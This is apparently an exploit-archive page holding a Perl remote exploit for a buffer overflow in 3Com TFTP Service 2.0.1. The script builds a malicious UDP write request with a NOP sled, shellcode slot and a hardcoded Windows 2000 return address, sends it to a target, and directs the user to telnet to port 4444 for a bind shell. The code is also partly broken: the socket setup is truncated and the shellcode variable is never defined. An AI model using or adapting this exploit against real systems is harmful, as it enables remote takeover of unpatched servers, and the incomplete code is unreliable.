3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Exploit (perl)

Javier Perez 28.02.2007 Verified Vulnerable-App
Remote Exploits Windows

Exploit Code

#!/usr/bin/perl -w
# ===============================================================================================
#                3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Perl Exploit
#                               By Umesh Wanve (umesh_345@yahoo.com)
# ==============================================================================================          
# Credits : Liu Qixu is credited with the discovery of this vulnerability.
# Reference : http://www.securityfocus.com/bid/21301
# Date : 27-02-2007
# Tested on Windows 2000 SP4 Server English
#           Windows 2000 SP4 Professional English
# You can replace shellcode with your favourite one :)
# Buffer overflow exists in transporting mode name of TFTP server.
# So here you go.
# Buffer = "\x00\x02"      +  "filename"    +  "\x00" +  nop sled +  Shellcode + JUMP  + "\x00";
# This was written for educational purpose. Use it at your own risk.Author will be not be responsible for any damage.
# #
use IO::Socket;

 print "\n3COM Tftp long transport name exploit\n";
 print "\tCoded by Umesh wanve\n\n";
 print "Use: 3com_tftp.pl <host> <port>\n\n";

$target = IO::Socket::INET->new(Proto=>'udp',
                            or die "Cannot connect to $ARGV[0] on port $ARGV[1]";

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com

print "++ Building Malicous Packet .....\n";

$nop="\x90" x 129;  

$jmp_2000 = "\x0e\x08\xe5\x77";                              # jmp esi user32.dll windows 2000 sp4 english (on 27-02-2007)

$exploit = "\x00\x02";                                      #write request (header)

$exploit=$exploit."A";                                      #file name   

$exploit=$exploit."\x00";                                   #Start of transporting name

$exploit=$exploit.$nop;                                     #nop sled to land into shellcode 

$exploit=$exploit.$shellcode;                               #our Hell code 

$exploit=$exploit.$jmp_2000;                               #jump to shellcode 

$exploit=$exploit."\x00";                                   #end of TS mode name

print $target $exploit;                                     #Attack on victim

print "++ Exploit packet sent ...\n";

print "++ Done.\n";

print "++ Telnet to 4444 on victim's machine ....\n";




# milw0rm.com [2007-02-28]